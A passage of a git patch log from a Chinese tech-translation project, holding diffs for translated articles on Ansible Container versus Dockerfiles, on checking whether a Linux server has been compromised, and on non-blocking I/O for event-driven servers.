-[8]:http://events.linuxfoundation.org/events/open-source-summit-europe -[9]:https://opensource.com/users/tomastomecek -[10]:https://opensource.com/user/175651/feed -[11]:https://opensource.com/tags/docker -[12]:https://www.ansible.com/ansible-container -[13]:https://github.com/docker-library/golang/blob/master/Dockerfile-debian.template#L14 -[14]:https://github.com/moby/moby/tree/master/builder/dockerfile -[15]:http://docs.ansible.com/wait_for_module.html -[16]:http://events.linuxfoundation.org/events/open-source-summit-europe -[17]:http://events.linuxfoundation.org/events/open-source-summit-europe/program/schedule -[18]:https://opensource.com/users/tomastomecek -[19]:https://opensource.com/users/tomastomecek -[20]:https://opensource.com/users/tomastomecek -[21]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201#comments -[22]:https://opensource.com/tags/ansible -[23]:https://opensource.com/tags/containers -[24]:https://opensource.com/tags/ansible -[25]:https://opensource.com/tags/docker -[26]:https://opensource.com/tags/open-source-summit diff --git a/translated/tech/20171005 How to manage Linux containers with Ansible Container.md b/translated/tech/20171005 How to manage Linux containers with Ansible Container.md new file mode 100644 index 0000000000..624d25694a --- /dev/null +++ b/translated/tech/20171005 How to manage Linux containers with Ansible Container.md @@ -0,0 +1,116 @@ +怎么去使用 Ansible Container 去管理 Linux 容器 +============================================================ + +### Ansible Container 处理 Dockerfile 的不足和对容器化项目提供完整的管理。 + +![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") +Image by : opensource.com + +我喜欢容器,并且每天都使用这个技术。在过去几个月,在一组项目中已经解决了我遇到的问题,即便如此,容器并不完美。 + +我刚开始时,用 [Docker][11] 使用容器,因为这个项目使这个技术非常流行。除此之外,使用这个容器引擎,我学到了怎么去使用 **[docker-compose][6]** 以及怎么去用它管理我的项目。使用它使我的生产力猛增!一个命令去运行我的项目,而不管它有多复杂。因此,我太高兴了。 + +使用一段时间之后,我发现了一些问题。最明显的问题是创建窗口镜像的过程。Docker 工具使用一个定制的文件格式作为一个 Recipe 去制作容器镜像 — Dockerfiles。这个格式很容易学会,并且很短的一段时间之后,你就可以为你自己制作容器镜像了。但是,一旦你希望去掌握最佳实践或者有复杂场景的想法,问题就会出现。 + +Ansible 的更多资源 + +* [Ansible 是怎么工作的][1] + +* [免费的 Ansible 电子书][2] + +* [Ansible 快速上手视频][3] + +* [下载和安装 Ansible][4] + +让我们先休息一会儿,先去了解一个不同的东西:[Ansible][22] 的世界。你知道它吗?它棒极了,是吗?你不这么认为?好吧,是时候去学习一些新事物了。Ansible 是一个项目,它允许你通过写一些任务去管理你的基础设施,并在你选择的环境中运行它们。不需要去安装和设置任何的服务;你可以从你的笔记本电脑中去很很容易地做任何事情。许多人已经接受 Ansible 了。 + +想像一下这样的场景:你在 Ansible 中,你写了很多的 Ansible 角色和 playbooks,你可以用它们去管理你的基础设施,并且想把它们运用到容器中。你应该怎么做?开始通过 shell 脚本和 Dockerfiles 去写容器镜像定义?听起来好像不对。 + +来自 Ansible 开发团队的一些人问到这个问题,并且它们意识到,人们每天使用那些同样的 Ansible 角色和 playbooks 也可以用来制作容器镜像。但是 Ansible 能做到的不止这些 — 它可以被用于去管理容器化项目的完整的生命周期。从这些想法中,[Ansible Container][12] 项目诞生了。它使用已有的可以变成容器镜像的 Ansible 角色,甚至可以被用于应用程序在生产系统中从构建到部署的完整生命周期。 + +现在让我们讨论一下,在 Dockerfiles 环境中关于最佳实践时可能存在的问题。这里有一个警告:这将是非常具体且技术性的。出现最多的三个问题有: + +### 1\. 在 Dockerfiles 中内嵌的 Shell 脚本。 + +当写 Dockerfiles 时,你可以通过 **/bin/sh -c** 解释指定的脚本。它可以做类似这样的事情: + +``` +RUN dnf install -y nginx +``` + +RUN 处是一个 Dockerfile 指令并且其它的都是参数(它传递给 shell)。但是,想像一个更复杂的场景: + +``` +RUN set -eux; \ +    \ +# this "case" statement is generated via "update.sh" +    %%ARCH-CASE%%; \ +    \ +    url="https://golang.org/dl/go${GOLANG_VERSION}.${goRelArch}.tar.gz"; \ +    wget -O go.tgz "$url"; \ +    echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ +``` + +这仅是从 [the official golang image][13] 中拿来的一个。它看起来并不好看,是不是? + +### 2\. 你解析 Dockerfiles 并不容易。 + +Dockerfiles 是一个没有正式规范的新格式。如果你需要在你的基础设施(比如,让构建过程自动化一点)中去处理 Dockerfiles 将会很复杂。仅有的规划是 [这个代码][14],它是 **dockerd** 的一部分。问题是你不能使用它作为一个库(library)。最容易的解决方案是你自己写一个解析器,然后祈祷它运行的很好。使用一些众所周知的标记语言不是更好吗?比如,YAML 或者 JSON。 + +### 3\. 管理困难。 + +如果你熟悉容器镜像的内部结构,你可能知道每个镜像是由层(layers)构成的。一旦容器被创建,这些层就使用联合文件系统技术堆叠在一起(像煎饼一样)。问题是,你并不能显式地管理这些层 — 你不能说,“这儿开始一个新层”,你被迫使用一种可读性不好的方法去改变你的 Dockerfile。最大的问题是,必须遵循一套最佳实践以去达到最优结果 — 新来的人在这个地方可能很困难。 + +### Ansible 语言和 Dockerfiles 比较 + +相比 Ansible,Dockerfiles 的最大缺点,也是 Ansible 的优点,作为一个语言,Ansible 更强大。例如,Dockerfiles 没有直接的变量概念,而 Ansible 有一个完整的模板系统(变量只是它其中的一个特性)。Ansible 包含了很多更易于使用的模块,比如,[**wait_for**][15],它可以被用于服务就绪检查,比如,在处理之前等待服务准备就绪。在 Dockerfiles 中,做任何事情都通过一个 shell 脚本。因此,如果你想去找出已准备好的服务,它必须使用 shell(或者独立安装)去做。使用 shell 脚本的其它问题是,它会变得很复杂,维护成为一种负担。很多人已经找到了这个问题,并将这些 shell 脚本转到 Ansible。 + +如果你对这个主题感兴趣,并且想去了解更多内容,请访问 [Open Source Summit][16],在 Prague 去看 [我的演讲][17],时间是 10 月 23 日,星期一,4:20 p.m. 在 Palmovka room 中。 + + _看更多的 Tomas Tomecek 演讲,[从 Dockerfiles 到 Ansible Container][7],在 [Open Source Summit EU][8],它将在 10 月 23-26 日在 Prague 召开。_ + + + +### 关于作者 + + [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - 工程师、Hacker、演讲者、Tinker、Red Hatter。喜欢容器、linux、开源软件、python 3、rust、zsh、tmux。[More about me][9] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/10/dockerfiles-ansible-container + +作者:[Tomas Tomecek][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/tomastomecek +[1]:https://www.ansible.com/how-ansible-works?intcmp=701f2000000h4RcAAI +[2]:https://www.ansible.com/ebooks?intcmp=701f2000000h4RcAAI +[3]:https://www.ansible.com/quick-start-video?intcmp=701f2000000h4RcAAI +[4]:https://docs.ansible.com/ansible/latest/intro_installation.html?intcmp=701f2000000h4RcAAI +[5]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201&rate=Wiw_0D6PK_CAjqatYu_YQH0t1sNHEF6q09_9u3sYkCY +[6]:https://github.com/docker/compose +[7]:http://sched.co/BxIW +[8]:http://events.linuxfoundation.org/events/open-source-summit-europe +[9]:https://opensource.com/users/tomastomecek +[10]:https://opensource.com/user/175651/feed +[11]:https://opensource.com/tags/docker +[12]:https://www.ansible.com/ansible-container +[13]:https://github.com/docker-library/golang/blob/master/Dockerfile-debian.template#L14 +[14]:https://github.com/moby/moby/tree/master/builder/dockerfile +[15]:http://docs.ansible.com/wait_for_module.html +[16]:http://events.linuxfoundation.org/events/open-source-summit-europe +[17]:http://events.linuxfoundation.org/events/open-source-summit-europe/program/schedule +[18]:https://opensource.com/users/tomastomecek +[19]:https://opensource.com/users/tomastomecek +[20]:https://opensource.com/users/tomastomecek +[21]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201#comments +[22]:https://opensource.com/tags/ansible +[23]:https://opensource.com/tags/containers +[24]:https://opensource.com/tags/ansible +[25]:https://opensource.com/tags/docker +[26]:https://opensource.com/tags/open-source-summit + + From f2f1ab9ebebe43b2044f89025b5929f246db693b Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 15:32:23 +0800 Subject: [PATCH 0344/1627] PRF:20171128 How To Tell If Your Linux Server Has Been Compromised.md @lujun9972 --- ... Your Linux Server Has Been Compromised.md | 108 ++++++++---------- 1 file changed, 47 insertions(+), 61 deletions(-) diff --git a/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md index 29fe95d868..3ce5f449e3 100644 --- a/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ b/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -1,49 +1,48 @@ -如何判断Linux服务器是否被入侵 --------------- +如何判断 Linux 服务器是否被入侵? +========================= -本指南中所谓的服务器被入侵或者说被黑了的意思是指未经认证的人或程序为了自己的目的登录到服务器上去并使用其计算资源, 通常会产生不好的影响。 +本指南中所谓的服务器被入侵或者说被黑了的意思,是指未经授权的人或程序为了自己的目的登录到服务器上去并使用其计算资源,通常会产生不好的影响。 -免责声明: 若你的服务器被类似NSA这样的国家机关或者某个犯罪集团如请,那么你并不会发现有任何问题,这些技术也无法发觉他们的存在。 +免责声明:若你的服务器被类似 NSA 这样的国家机关或者某个犯罪集团入侵,那么你并不会注意到有任何问题,这些技术也无法发觉他们的存在。 -然而, 大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋犯罪所入侵的。 +然而,大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋罪犯所入侵的。 这类攻击者会在访问服务器的同时滥用服务器资源,并且不怎么会采取措施来隐藏他们正在做的事情。 -### 入侵服务器的症状 +### 被入侵服务器的症状 -当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗100%的资源. 他们可能消耗CPU资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 `DoS` 攻击。 +当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗 100% 的资源。他们可能消耗 CPU 资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 DoS 攻击。 -因此出现问题的第一个表现就是服务器 “变慢了”. 这可能表现在网站的页面打开的很慢, 或者电子邮件要花很长时间才能发送出去。 +因此出现问题的第一个表现就是服务器 “变慢了”。这可能表现在网站的页面打开的很慢,或者电子邮件要花很长时间才能发送出去。 那么你应该查看那些东西呢? #### 检查 1 - 当前都有谁在登录? -你首先要查看当前都有谁登录在服务器上. 发现攻击者登录到服务器上进行操作并不罕见。 +你首先要查看当前都有谁登录在服务器上。发现攻击者登录到服务器上进行操作并不复杂。 -其对应的命令是 `w`. 运行 `w` 会输出如下结果: +其对应的命令是 `w`。运行 `w` 会输出如下结果: ``` 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@coopeaa12 root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w - ``` -第一个IP是英国IP,而第二个IP是越南IP. 这个不是个好兆头。 +第一个 IP 是英国 IP,而第二个 IP 是越南 IP。这个不是个好兆头。 -停下来做个深呼吸, 不要紧,只需要杀掉他们的SSH连接就好了. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in。 +停下来做个深呼吸, 不要恐慌之下只是干掉他们的 SSH 连接。除非你能够防止他们再次进入服务器,否则他们会很快进来并踢掉你,以防你再次回去。 -请参阅本文最后的 `入侵之后怎么办` 这一章节来看发现被入侵的证据后应该怎么办。 +请参阅本文最后的“被入侵之后怎么办”这一章节来看找到了被入侵的证据后应该怎么办。 -`whois` 命令可以接一个IP地址然后告诉你IP注册的组织的所有信息, 当然就包括所在国家的信息。 +`whois` 命令可以接一个 IP 地址然后告诉你该 IP 所注册的组织的所有信息,当然就包括所在国家的信息。 #### 检查 2 - 谁曾经登录过? -Linux 服务器会记录下哪些用户,从哪个IP,在什么时候登录的以及登陆了多长时间这些信息. 使用 `last` 命令可以查看这些信息。 +Linux 服务器会记录下哪些用户,从哪个 IP,在什么时候登录的以及登录了多长时间这些信息。使用 `last` 命令可以查看这些信息。 -输出类似这样: +输出类似这样: ``` root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in @@ -51,104 +50,91 @@ root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01) root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18) root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) - ``` -这里可以看到英国IP和越南IP交替出现, 而且最上面两个IP现在还处于登录状态. 如果你看到任何未经授权的IP,那么请参阅最后章节。 +这里可以看到英国 IP 和越南 IP 交替出现,而且最上面两个 IP 现在还处于登录状态。如果你看到任何未经授权的 IP,那么请参阅最后章节。 -登录历史记录会以文本格式记录到 `~/.bash_history`(注:这里作者应该写错了)中,因此很容易被删除。 -通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为. 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号。 +登录后的历史记录会记录到二进制的 `/var/log/wtmp` 文件中(LCTT 译注:这里作者应该写错了,根据实际情况修改),因此很容易被删除。通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为。 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号。 如果没有登录历史的话,请一定小心,继续留意入侵的其他线索。 #### 检查 3 - 回顾命令历史 -这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情。 -一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的软件。 +这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情。 +一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的非常规软件。 -命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为。 -跟登录历史一样, 若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了. 这也是个不妙的信号,你需要很小心地检查一下服务器了。 +命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为。跟登录历史一样,若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了。这也是个不妙的信号,你需要很小心地检查一下服务器了。(LCTT 译注,如果没有命令历史,也有可能是你的配置错误。) -#### 检查 4 - 哪些进程在消耗CPU? +#### 检查 4 - 哪些进程在消耗 CPU? -你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情. 他们会运行一些特别消耗CPU的进程. 这就很容易发着这些进程了. 只需要运行 `top` 然后看最前的那几个进程就行了。 +你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情。他们会运行一些特别消耗 CPU 的进程。这就很容易发现这些进程了。只需要运行 `top` 然后看最前的那几个进程就行了。 -这也能显示出那些未登录的攻击者来. 比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件。 +这也能显示出那些未登录进来的攻击者。比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件。 -如果你最上面的进程对不了解,那么你可以google一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么。 +如果你最上面的进程对不了解,那么你可以 Google 一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么。 -使用这些工具,第一步从 `top` 中拷贝出进程的 PID,然后运行: - -```shell -strace -p PID +使用这些工具,第一步从 `top` 中拷贝出进程的 PID,然后运行: +``` +strace -p PID ``` -这会显示出进程调用的所有系统调用. 它产生的内容会很多,但这些信息能告诉你这个进程在做什么。 +这会显示出该进程调用的所有系统调用。它产生的内容会很多,但这些信息能告诉你这个进程在做什么。 ``` lsof -p PID - ``` -这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情。 +这个程序会列出该进程打开的文件。通过查看它访问的文件可以很好的理解它在做的事情。 #### 检查 5 - 检查所有的系统进程 -消耗CPU不严重的未认证进程可能不会在 `top` 中显露出来,不过它依然可以通过 `ps` 列出来. 命令 `ps auxf` 就能显示足够清晰的信息了。 +消耗 CPU 不严重的未授权进程可能不会在 `top` 中显露出来,不过它依然可以通过 `ps` 列出来。命令 `ps auxf` 就能显示足够清晰的信息了。 -你需要检查一下每个不认识的进程. 经常运行 `ps` (这是个好习惯) 能帮助你发现奇怪的进程。 +你需要检查一下每个不认识的进程。经常运行 `ps` (这是个好习惯)能帮助你发现奇怪的进程。 #### 检查 6 - 检查进程的网络使用情况 -`iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址。 -类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端。 +`iftop` 的功能类似 `top`,它会排列显示收发网络数据的进程以及它们的源地址和目的地址。类似 DoS 攻击或垃圾机器人这样的进程很容易显示在列表的最顶端。 #### 检查 7 - 哪些进程在监听网络连接? -通常攻击者会安装一个后门程序专门监听网络端口接受指令. 该进程等待期间是不会消耗CPU和带宽的,因此也就不容易通过 `top` 之类的命令发现。 +通常攻击者会安装一个后门程序专门监听网络端口接受指令。该进程等待期间是不会消耗 CPU 和带宽的,因此也就不容易通过 `top` 之类的命令发现。 -`lsof` 和 `netstat` 命令都会列出所有的联网进程. 我通常会让他们带上下面这些参数: +`lsof` 和 `netstat` 命令都会列出所有的联网进程。我通常会让它们带上下面这些参数: ``` lsof -i - ``` ``` netstat -plunt - ``` -你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED)。 -如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西。 +你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED)。如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西。 ### 被入侵之后该怎么办呢? -首先,不要紧张, 尤其当攻击者正处于登陆状态时更不能紧张. 你需要在攻击者警觉到你已经发现他之前夺回机器的控制权。 -如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹。 +首先,不要紧张,尤其当攻击者正处于登录状态时更不能紧张。**你需要在攻击者警觉到你已经发现他之前夺回机器的控制权。**如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹。 -如果你技术不太好那么就直接关机吧. 你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令. 也可以登陆主机提供商的控制面板中关闭服务器。 -关机后,你就可以开始配置防火墙或者咨询一下供应商的意见。 +如果你技术不太好那么就直接关机吧。你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令之一。也可以登录主机提供商的控制面板中关闭服务器。关机后,你就可以开始配置防火墙或者咨询一下供应商的意见。 -如果你对自己颇有自信,而你的主机提供商也有提供上游防火墙,那么你只需要以此创建并启用下面两条规则就行了: +如果你对自己颇有自信,而你的主机提供商也有提供上游防火墙,那么你只需要以此创建并启用下面两条规则就行了: -1. 只允许从你的IP地址登陆SSH +1. 只允许从你的 IP 地址登录 SSH。 +2. 封禁除此之外的任何东西,不仅仅是 SSH,还包括任何端口上的任何协议。 -2. 封禁除此之外的任何东西,不仅仅是SSH,还包括任何端口上的任何协议。 +这样会立即关闭攻击者的 SSH 会话,而只留下你可以访问服务器。 -这样会立即关闭攻击者的SSH会话,而只留下你访问服务器。 +如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的 SSH 会话。(LCTT 译注:本地防火墙规则 有可能不会阻止已经建立的 SSH 会话,所以保险起见,你需要手工杀死该会话。) -如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的ssh会话。 - -最后还有一种方法, 就是通过诸如串行控制台之类的带外连接登陆服务器,然后通过 `systemctl stop network.service` 停止网络功能。 -这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了。 +最后还有一种方法,如果支持的话,就是通过诸如串行控制台之类的带外连接登录服务器,然后通过 `systemctl stop network.service` 停止网络功能。这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了。 重夺服务器的控制权后,也不要以为就万事大吉了。 -不要试着修复这台服务器,让后接着用. 你永远不知道攻击者做过什么因此你也永远无法保证这台服务器还是安全的。 +不要试着修复这台服务器,然后接着用。你永远不知道攻击者做过什么,因此你也永远无法保证这台服务器还是安全的。 -最好的方法就是拷贝出所有的资料,然后重装系统。 +最好的方法就是拷贝出所有的数据,然后重装系统。(LCTT 译注:你的程序这时已经不可信了,但是数据一般来说没问题。) -------------------------------------------------------------------------------- @@ -156,7 +142,7 @@ via: https://bash-prompt.net/guides/server-hacked/ 作者:[Elliot Cooper][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 1244a3c6b4497768bc21ded74d948d82ea3ad0b8 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 15:32:44 +0800 Subject: [PATCH 0345/1627] PUB:20171128 How To Tell If Your Linux Server Has Been Compromised.md @lujun9972 https://linux.cn/article-9116-1.html --- ...71128 How To Tell If Your Linux Server Has Been Compromised.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171128 How To Tell If Your Linux Server Has Been Compromised.md (100%) diff --git a/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/published/20171128 How To Tell If Your Linux Server Has Been Compromised.md similarity index 100% rename from translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md rename to published/20171128 How To Tell If Your Linux Server Has Been Compromised.md From b8190d86deb4bb182bc3a11a23d2465d94c7b70e Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 16:22:31 +0800 Subject: [PATCH 0346/1627] PRF:20171006 Concurrent Servers Part 3 - Event-driven.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @GitFuture 很辛苦, 这么长,这么专业的文章。 --- ...oncurrent Servers Part 3 - Event-driven.md | 105 ++++++++---------- 1 file changed, 44 insertions(+), 61 deletions(-) diff --git a/translated/tech/20171006 Concurrent Servers Part 3 - Event-driven.md b/translated/tech/20171006 Concurrent Servers Part 3 - Event-driven.md index 01c1d74112..1c0a0a329f 100644 --- a/translated/tech/20171006 Concurrent Servers Part 3 - Event-driven.md +++ b/translated/tech/20171006 Concurrent Servers Part 3 - Event-driven.md @@ -1,9 +1,9 @@ -并发服务器(3) —— 事件驱动 +并发服务器(三):事件驱动 ============================================================ -这是《并发服务器》系列的第三节。[第一节][26] 介绍了阻塞式编程,[第二节 —— 线程][27] 探讨了多线程,将其作为一种可行的方法来实现服务器并发编程。 +这是并发服务器系列的第三节。[第一节][26] 介绍了阻塞式编程,[第二节:线程][27] 探讨了多线程,将其作为一种可行的方法来实现服务器并发编程。 -另一种常见的实现并发的方法叫做 _事件驱动编程_,也可以叫做 _异步_ 编程 [^注1][28]。这种方法变化万千,因此我们会从最基本的开始,使用一些基本的 APIs 而非从封装好的高级方法开始。本系列以后的文章会讲高层次抽象,还有各种混合的方法。 +另一种常见的实现并发的方法叫做 _事件驱动编程_,也可以叫做 _异步_ 编程 ^注1 。这种方法变化万千,因此我们会从最基本的开始,使用一些基本的 API 而非从封装好的高级方法开始。本系列以后的文章会讲高层次抽象,还有各种混合的方法。 本系列的所有文章: @@ -13,13 +13,13 @@ ### 阻塞式 vs. 非阻塞式 I/O -要介绍这个标题,我们先讲讲阻塞和非阻塞 I/O 的区别。阻塞式 I/O 更好理解,因为这是我们使用 I/O 相关 API 时的“标准”方式。从套接字接收数据的时候,调用 `recv` 函数会发生 _阻塞_,直到它从端口上接收到了来自另一端套接字的数据。这恰恰是第一部分讲到的顺序服务器的问题。 +作为本篇的介绍,我们先讲讲阻塞和非阻塞 I/O 的区别。阻塞式 I/O 更好理解,因为这是我们使用 I/O 相关 API 时的“标准”方式。从套接字接收数据的时候,调用 `recv` 函数会发生 _阻塞_,直到它从端口上接收到了来自另一端套接字的数据。这恰恰是第一部分讲到的顺序服务器的问题。 因此阻塞式 I/O 存在着固有的性能问题。第二节里我们讲过一种解决方法,就是用多线程。哪怕一个线程的 I/O 阻塞了,别的线程仍然可以使用 CPU 资源。实际上,阻塞 I/O 通常在利用资源方面非常高效,因为线程就等待着 —— 操作系统将线程变成休眠状态,只有满足了线程需要的条件才会被唤醒。 -_非阻塞式_ I/O 是另一种思路。把套接字设成非阻塞模式时,调用 `recv` 时(还有 `send`,但是我们现在只考虑接收),函数返回地会很快,哪怕没有数据要接收。这时,就会返回一个特殊的错误状态 ^[注2][15] 来通知调用者,此时没有数据传进来。调用者可以去做其他的事情,或者尝试再次调用 `recv` 函数。 +_非阻塞式_ I/O 是另一种思路。把套接字设成非阻塞模式时,调用 `recv` 时(还有 `send`,但是我们现在只考虑接收),函数返回的会很快,哪怕没有接收到数据。这时,就会返回一个特殊的错误状态 ^注2 来通知调用者,此时没有数据传进来。调用者可以去做其他的事情,或者尝试再次调用 `recv` 函数。 -证明阻塞式和非阻塞式的 `recv` 区别的最好方式就是贴一段示例代码。这里有个监听套接字的小程序,一直在 `recv` 这里阻塞着;当 `recv` 返回了数据,程序就报告接收到了多少个字节 ^[注3][16]: +示范阻塞式和非阻塞式的 `recv` 区别的最好方式就是贴一段示例代码。这里有个监听套接字的小程序,一直在 `recv` 这里阻塞着;当 `recv` 返回了数据,程序就报告接收到了多少个字节 ^注3 : ``` int main(int argc, const char** argv) { @@ -69,8 +69,7 @@ hello # wait for 2 seconds after typing this socket world ^D # to end the connection> ``` - -The listening program will print the following: + 监听程序会输出以下内容: ``` @@ -144,7 +143,6 @@ int main(int argc, const char** argv) { 这里与阻塞版本有些差异,值得注意: 1. `accept` 函数返回的 `newsocktfd` 套接字因调用了 `fcntl`, 被设置成非阻塞的模式。 - 2. 检查 `recv` 的返回状态时,我们对 `errno` 进行了检查,判断它是否被设置成表示没有可供接收的数据的状态。这时,我们仅仅是休眠了 200 毫秒然后进入到下一轮循环。 同样用 `nc` 进行测试,以下是非阻塞监听器的输出: @@ -183,19 +181,19 @@ Peer disconnected; I'm done. 作为练习,给输出添加一个时间戳,确认调用 `recv` 得到结果之间花费的时间是比输入到 `nc` 中所用的多还是少(每一轮是 200 ms)。 -这里就实现了使用非阻塞的 `recv` 让监听者检查套接字变为可能,并且在没有数据的时候重新获得控制权。换句话说,这就是 _polling(轮询)_ —— 主程序周期性的查询套接字以便读取数据。 +这里就实现了使用非阻塞的 `recv` 让监听者检查套接字变为可能,并且在没有数据的时候重新获得控制权。换句话说,用编程的语言说这就是 轮询polling —— 主程序周期性的查询套接字以便读取数据。 对于顺序响应的问题,这似乎是个可行的方法。非阻塞的 `recv` 让同时与多个套接字通信变成可能,轮询这些套接字,仅当有新数据到来时才处理。就是这样,这种方式 _可以_ 用来写并发服务器;但实际上一般不这么做,因为轮询的方式很难扩展。 -首先,我在代码中引入的 200 ms 延迟对于记录非常好(监听器在我输入 `nc` 之间只打印几行 “Calling recv...”,但实际上应该有上千行)。但它也增加了多达 200 ms 的服务器响应时间,这几乎是意料不到的。实际的程序中,延迟会低得多,休眠时间越短,进程占用的 CPU 资源就越多。有些时钟周期只是浪费在等待,这并不好,尤其是在移动设备上,这些设备的电量往往有限。 +首先,我在代码中引入的 200ms 延迟对于演示非常好(监听器在我输入 `nc` 之间只打印几行 “Calling recv...”,但实际上应该有上千行)。但它也增加了多达 200ms 的服务器响应时间,这无意是不必要的。实际的程序中,延迟会低得多,休眠时间越短,进程占用的 CPU 资源就越多。有些时钟周期只是浪费在等待,这并不好,尤其是在移动设备上,这些设备的电量往往有限。 -但是当我们实际这样来使用多个套接字的时候,更严重的问题出现了。想像下监听器正在同时处理 1000 个 客户端。这意味着每一个循环迭代里面,它都得为 _这 1000 个套接字中的每一个_ 执行一遍非阻塞的 `recv`,找到其中准备好了数据的那一个。这非常低效,并且极大的限制了服务器能够并发处理的客户端数。这里有个准则:每次轮询之间等待的间隔越久,服务器响应性越差;而等待的时间越少,CPU 在无用的轮询上耗费的资源越多。 +但是当我们实际这样来使用多个套接字的时候,更严重的问题出现了。想像下监听器正在同时处理 1000 个客户端。这意味着每一个循环迭代里面,它都得为 _这 1000 个套接字中的每一个_ 执行一遍非阻塞的 `recv`,找到其中准备好了数据的那一个。这非常低效,并且极大的限制了服务器能够并发处理的客户端数。这里有个准则:每次轮询之间等待的间隔越久,服务器响应性越差;而等待的时间越少,CPU 在无用的轮询上耗费的资源越多。 -讲真,所有的轮询都像是无用功。当然操作系统应该是知道哪个套接字是准备好了数据的,因此没必要逐个扫描。事实上,就是这样,接下来就会讲一些API,让我们可以更优雅地处理多个客户端。 